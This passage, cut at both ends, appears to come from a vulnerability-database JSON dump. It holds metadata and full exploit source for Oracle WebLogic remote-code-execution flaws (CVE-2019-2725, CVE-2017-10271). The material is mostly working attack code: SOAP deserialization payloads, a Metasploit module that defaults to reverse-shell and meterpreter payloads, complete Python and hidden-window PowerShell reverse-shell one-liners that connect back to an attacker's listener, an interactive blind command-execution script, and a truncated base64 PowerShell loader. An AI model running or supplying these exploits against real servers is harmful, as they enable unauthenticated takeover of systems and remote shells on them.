dQAvAFkAUgB1ADcAeAA0AEgAbgBSAEMAMQBRAEcAWQBVAGMAWQBUAGIAOQBHAEYANABOAEEAYQBiAGwAegBlAGcAYwB6AHUAcwArAFIAeQBKADIAQgBvAGIAeABpAGcAMABRAGgAUwA0ADgAdwBsAEcASgBrAGkAYgBqADYAaAB0ADgAcwBiAG0AZwAyAE0ANwB4AG0AaAAwAE0AcQAvAGQAUAA5AFQAbQA0AEQATQBaAHIAegA3AFkAUABYAFQAVQA5AGgAegBEAE0ASQA2AGkAZQAvAGcAMQBrAEcAYwB2ADEALwBIAFkAZgBEAHAAYgBQAFEAbgBjAHUAdwBYAGIATgA4AGIANQA4AE8ATgBiAHkAUgBFAGcAUwBTAGsAeQBhADgAMABYAHUAZgA5AFIAeQA3AFoAeABrAHMANAB4AEEAMAA1AEEATQB5ADcASwBzAE0AMgBUAGQAdAA1AGUASABVADYAbABoAHEAYgBKAEsALwBtAEIASgBEAEYAaABjAEsAUABCAG4AVgBlAFEARwBUAEgARwBQAGQAbgBjAG8AUQAvAEQAdABiAEoAdgA5AHYATAB1AEcAYwBMAHcAOQBPAFQAVgBrAGEANAA4AEMAKwBwAGYAZQAzADYAeABkAEgARgB4AEIAeQA1AEMAZABlAHoANABXACsAbQBUAE8AQgBUAHoAYwBuAFYAOQBXAHEAMQBDAEQANgArAHUANgAxAFcASQA4AGQAZgBqAGEAdgBEAGwAUgB0AHYAYgBLAHMAdABMAFkASQBmAE0AcwAzAFcAMgBzADYANwBMAHUAaQBrAHQAKwA2AFAALwBGAGIARwA4AFYAdQBmAHcANQAvADgAYwBzAGEAOQByAFAAOQBuADkASgBSAFMAcgA1AFgAMgA4ADMAeQAxAC8AdQAvAEIAYgBpAFAANQB1ADMATABlAFkAQwBoAEIAMABvAGQARQB3AHMAcgAvAG4AWABnAHMALwA1ADgAYQBMAGwAdwBCAEkAQwBPAFEAOQB5AEIALwA1AEMAbgBlAFYAaQBlAE4ATABlAEQAVgA0AGMALwBnAFAAeQBrAHYAWgBDAGkAdwBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==\"\r\n\r\nurl = sys.argv[1]\r\n\r\nrequest_headers = {\"Accept-Encoding\": \"gzip, deflate\", \"Accept\": \"*/*\", \"Accept-Language\": \"en\", \"User-Agent\": \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\", \"Connection\": \"close\", \"Content-Type\": \"text/xml\"}\r\ndata=\"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:wsa=\\\"http://www.w3.org/2005/08/addressing\\\" xmlns:asy=\\\"http://www.bea.com/async/AsyncResponseService\\\">\\r\\n <soapenv:Header>\\r\\n <wsa:Action>xx</wsa:Action>\\r\\n <wsa:RelatesTo>xx</wsa:RelatesTo>\\r\\n <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\">\\r\\n <void class=\\\"java.lang.ProcessBuilder\\\">\\r\\n <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\\r\\n <void index=\\\"0\\\">\\r\\n <string>cmd</string>\\r\\n </void>\\r\\n <void index=\\\"1\\\">\\r\\n <string>/c</string>\\r\\n </void>\\r\\n <void index=\\\"2\\\">\\r\\n <string>%s</string>\\r\\n </void>\\r\\n </array>\\r\\n <void method=\\\"start\\\"/></void>\\r\\n </work:WorkContext>\\r\\n </soapenv:Header>\\r\\n <soapenv:Body>\\r\\n <asy:onAsyncDelivery/>\\r\\n </soapenv:Body>\\r\\n</soapenv:Envelope>\" % (exploit)\r\nresponse = requests.post(url, headers=request_headers, data=data)\r\nprint \"status_code:%s\" % str(response.status_code)\r\nprint(response)\n\n# 0day.today [2019-05-01] #", "sourceHref": "https://0day.today/exploit/32626", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2022-06-22T19:33:15", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-07T00:00:00", "type": "zdt", "title": "Oracle Weblogic Server Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-07T00:00:00", "id": "1337DAY-ID-32663", "href": "https://0day.today/exploit/description/32663", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n to execute code on the vulnerable host.\n },\n 'Author' =>\n [\n 'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-2725'],\n ['CNVD-C', '2019-48814'],\n ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],\n ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']\n ],\n 'Privileged' => false,\n 'Platform' => %w{ unix win solaris },\n 'Targets' =>\n [\n [ 'Unix',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}\n ],\n [ 'Windows',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}\n ],\n [ 'Solaris',\n 'Platform' => 'solaris',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},\n 'Payload' => {\n 'Space' => 2048,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet',\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 12\n },\n 'DisclosureDate' => 'Apr 23 2019'))\n\n register_options(\n [\n Opt::RPORT(7001),\n OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),\n OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])\n ]\n )\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(datastore['WSPATH']),\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'headers' => {'SOAPAction' => '' }\n )\n\n if res && res.code == 500 && res.body.include?(\"<faultcode>env:Client</faultcode>\")\n vprint_status(\"The target returned a vulnerable HTTP code: /#{res.code}\")\n vprint_status(\"The target returned a vulnerable HTTP error: /#{res.body.split(\"\\n\")[0]}\")\n Exploit::CheckCode::Vulnerable\n elsif res && res.code != 202\n vprint_status(\"The target returned a non-vulnerable HTTP code\")\n Exploit::CheckCode::Safe\n elsif res.nil?\n vprint_status(\"The target did not respond in an expected way\")\n Exploit::CheckCode::Unknown\n else\n vprint_status(\"The target returned HTTP code: #{res.code}\")\n vprint_status(\"The target returned HTTP body: #{res.body.split(\"\\n\")[0]} [...]\")\n Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n print_status(\"Generating payload...\")\n case target.name\n when 'Windows'\n string0_cmd = 'cmd.exe'\n string1_param = '/c'\n shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })\n when 'Unix','Solaris'\n string0_cmd = '/bin/bash'\n string1_param = '-c'\n shell_payload = payload.encoded\n end\n\n random_action = rand_text_alphanumeric(20)\n random_relates = rand_text_alphanumeric(20)\n\n soap_payload = %Q|<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"|\n soap_payload << %Q|xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"|\n soap_payload << %Q|xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">|\n soap_payload << %Q|<soapenv:Header>|\n soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>|\n soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|\n soap_payload << %Q|<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">|\n soap_payload << %Q|<void class=\"java.lang.ProcessBuilder\">|\n soap_payload << %Q|<array class=\"java.lang.String\" length=\"3\">|\n soap_payload << %Q|<void index=\"0\">|\n soap_payload << %Q|<string>#{string0_cmd}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"1\">|\n soap_payload << %Q|<string>#{string1_param}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|<void index=\"2\">|\n soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>|\n #soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</array>|\n soap_payload << %Q|<void method=\"start\"/>|\n soap_payload << %Q|</void>|\n soap_payload << %Q|</work:WorkContext>|\n soap_payload << %Q|</soapenv:Header>|\n soap_payload << %Q|<soapenv:Body>|\n soap_payload << %Q|<asy:onAsyncDelivery/>|\n soap_payload << %Q|</soapenv:Body>|\n soap_payload << %Q|</soapenv:Envelope>|\n\n uri = normalize_uri(datastore['WSPATH'])\n if uri.nil?\n datastore['URIPATH'] = \"http://#{RHOST}:#{RPORT}/\"\n end\n\n print_status(\"Sending payload...\")\n\n begin\n res = send_request_cgi(\n 'uri' => uri,\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => soap_payload,\n 'headers' => {'SOAPAction' => '' }\n )\n rescue Errno::ENOTCONN\n fail_with(Failure::Disconnected, \"The target forcibly closed the connection, and is likely not vulnerable.\")\n end\n\n if res.nil?\n fail_with(Failure::Unreachable, \"No response from host\")\n elsif res && res.code != 202\n fail_with(Failure::UnexpectedReply,\"Exploit failed. Host did not responded with HTTP code #{res.code} instead of HTTP code 202\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/32663", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-03T00:00:00", "type": "exploitpack", "title": "Oracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-03T00:00:00", "id": "EXPLOITPACK:E47A4ABCB334901131160C872A570166", "href": "", "sourceData": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\n# Date Authored: Jan 3, 2018\n# Date Announced: 10/19/2017\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\n# Exploit is based off of POC by Luffin from Github\n# https://github.com/Luffin/CVE-2017-10271\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\n# CVE: CVE-2017-10271\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\n# (Python 3) Example check listener: python3 -m http.server 4444\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\n# (Netcat) Example exploit listener: nc -nlvp 4444\n\nfrom sys import exit\nfrom requests import post\nfrom argparse import ArgumentParser\nfrom random import choice\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom xml.sax.saxutils import escape\n\nclass Exploit:\n\n def __init__(self, check, rhost, lhost, lport, windows):\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\n self.lhost = lhost\n self.lport = lport\n self.check = check\n if windows:\n self.target = 'win'\n else:\n self.target = 'unix'\n\n if self.target == 'unix':\n # Unix reverse shell\n # You should also be able to instead use something from MSFVenom. E.g.\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\n ).format(lhost=self.lhost, lport=self.lport)\n else:\n # Windows reverse shell\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\n )\n self.cmd_payload = escape(self.cmd_payload)\n\n def cmd_base(self):\n if self.target == 'win':\n return 'cmd'\n return '/bin/sh'\n\n def cmd_opt(self):\n if self.target == 'win':\n return '/c'\n return '-c'\n\n\n def get_generic_check_payload(self):\n random_uri = ''.join(\n choice(ascii_uppercase + ascii_lowercase + digits)\n for _ in range(16))\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <object id=\"url\" class=\"java.net.URL\">\n <string>http://{lhost}:{lport}/{random_uri}</string>\n </object>\n <object idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n\n return generic_check_payload.format(\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\n\n def get_process_builder_payload(self):\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>{cmd_payload}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\n cmd_payload=self.cmd_payload)\n\n def print_banner(self):\n print(\"=\" * 80)\n print(\"CVE-2017-10271 RCE Exploit\")\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\n print(\"Shell Listener: {lhost}:{lport}\".format(\n lhost=self.lhost, lport=self.lport))\n print(\"=\" * 80)\n\n def post_exploit(self, data):\n headers = {\n \"Content-Type\":\n \"text/xml;charset=UTF-8\",\n \"User-Agent\":\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\n }\n payload = \"/wls-wsat/CoordinatorPortType\"\n\n vulnurl = self.url + payload\n try:\n req = post(\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\n if self.check:\n print(\"[*] Did you get an HTTP GET request back?\")\n else:\n print(\"[*] Did you get a shell back?\")\n except Exception as e:\n print('[!] Connection Error')\n print(e)\n\n def run(self):\n self.print_banner()\n if self.check:\n print('[+] Generating generic check payload')\n payload = self.get_generic_check_payload()\n else:\n print('[+] Generating execution payload')\n payload = self.get_process_builder_payload()\n print('[*] Generated:')\n print(payload)\n if self.check:\n print('[+] Running generic check payload')\n else:\n print('[+] Running {target} execute payload').format(target=self.target)\n\n self.post_exploit(data=payload)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n description=\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\n )\n parser.add_argument(\n '-l',\n '--lhost',\n required=True,\n dest='lhost',\n nargs='?',\n help='The listening host that the remote server should connect back to')\n parser.add_argument(\n '-p',\n '--lport',\n required=True,\n dest='lport',\n nargs='?',\n help='The listening port that the remote server should connect back to')\n parser.add_argument(\n '-r',\n '--rhost',\n required=True,\n dest='rhost',\n nargs='?',\n help='The remote host base URL that we should send the exploit to')\n parser.add_argument(\n '-c',\n '--check',\n dest='check',\n action='store_true',\n help=\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\n )\n parser.add_argument(\n '-w',\n '--win',\n dest='windows',\n action='store_true',\n help=\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\n )\n\n args = parser.parse_args()\n\n exploit = Exploit(\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\n windows=args.windows)\n exploit.run()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-26T00:00:00", "type": "exploitpack", "title": "Oracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2017-12-26T00:00:00", "id": "EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "href": "", "sourceData": "import requests\nimport sys\n\nurl_in = sys.argv[1]\npayload_url = url_in + \"/wls-wsat/CoordinatorPortType\"\npayload_header = {'content-type': 'text/xml'}\n\n\ndef payload_command (command_in):\n html_escape_table = {\n \"&\": \"&\",\n '\"': \"\"\",\n \"'\": \"&apos;\",\n \">\": \">\",\n \"<\": \"<\",\n }\n command_filtered = \"<string>\"+\"\".join(html_escape_table.get(c, c) for c in command_in)+\"</string>\"\n payload_1 = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\"> \\n\" \\\n \" <soapenv:Header> \" \\\n \" <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\"> \\n\" \\\n \" <java version=\\\"1.8.0_151\\\" class=\\\"java.beans.XMLDecoder\\\"> \\n\" \\\n \" <void class=\\\"java.lang.ProcessBuilder\\\"> \\n\" \\\n \" <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\" \\\n \" <void index = \\\"0\\\"> \" \\\n \" <string>cmd</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"1\\\"> \" \\\n \" <string>/c</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"2\\\"> \" \\\n + command_filtered + \\\n \" </void> \" \\\n \" </array>\" \\\n \" <void method=\\\"start\\\"/>\" \\\n \" </void>\" \\\n \" </java>\" \\\n \" </work:WorkContext>\" \\\n \" </soapenv:Header>\" \\\n \" <soapenv:Body/>\" \\\n \"</soapenv:Envelope>\"\n return payload_1\n\ndef do_post(command_in):\n result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)\n\n if result.status_code == 500:\n print \"Command Executed \\n\"\n else:\n print \"Something Went Wrong \\n\"\n\n\n\nprint \"***************************************************** \\n\" \\\n \"**************** Coded By 1337g ****************** \\n\" \\\n \"* CVE-2017-10271 Blind Remote Command Execute EXP * \\n\" \\\n \"***************************************************** \\n\"\n\nwhile 1:\n command_in = raw_input(\"Eneter your command here: \")\n if command_in == \"exit\" : exit(0)\n do_post(command_in)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle Weblogic 10.3.6.0.0 12.1.3.0.0 - Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-30T00:00:00", "type": "exploitpack", "title": "Oracle Weblogic 10.3.6.0.0 12.1.3.0.0 - Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725"], "modified": "2019-04-30T00:00:00", "id": "EXPLOITPACK:CB918002171E00C4EB94DA4B5828BA58", "href": "", "sourceData": "#!/usr/bin/python\n\n# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725\n# Date: 30/04/2019\n# Exploit Author: Avinash Kumar Thapa\n# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html\n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html\n# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0\n# Tested on:\n\t#OS: Windows 2012 R2 (Build 9600).\n\t#Architecture : x64\n\t#System Language : en_US\n\n\n# CVE : CVE-2019-2725\n\n\n# Script Usage:\n# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps\n# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1\n# Add the powershell command in the variable\n\n__author__ = \"Avinash Kumar Thapa\"\n__description__ = \"\"\"\nVulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server\n\nCREDIT STATEMENT:\nThe following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle:\n\nBadcode of Knownsec 404 Team: CVE-2019-2725\nHongwei Pan of Minsheng Banking Corp.: CVE-2019-2725\nLiao Xinxi of NSFOCUS Security Team: CVE-2019-2725\nLin Zheng of Minsheng Banking Corp.: CVE-2019-2725\nSong Keya of Minsheng Banking Corp.: CVE-2019-2725\nTianlei Li of Minsheng Banking Corp.: CVE-2019-2725\nZengShuai Hao: CVE-2019-2725\nZhiyi Zhang of 360 ESG Codesafe Team: CVE-2019-2725\n\n\"\"\"\n\nimport requests\nimport sys\n\nprint \"Exploit Written by Avinash Kumar Thapa\"\n\n\nexploit = \"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e 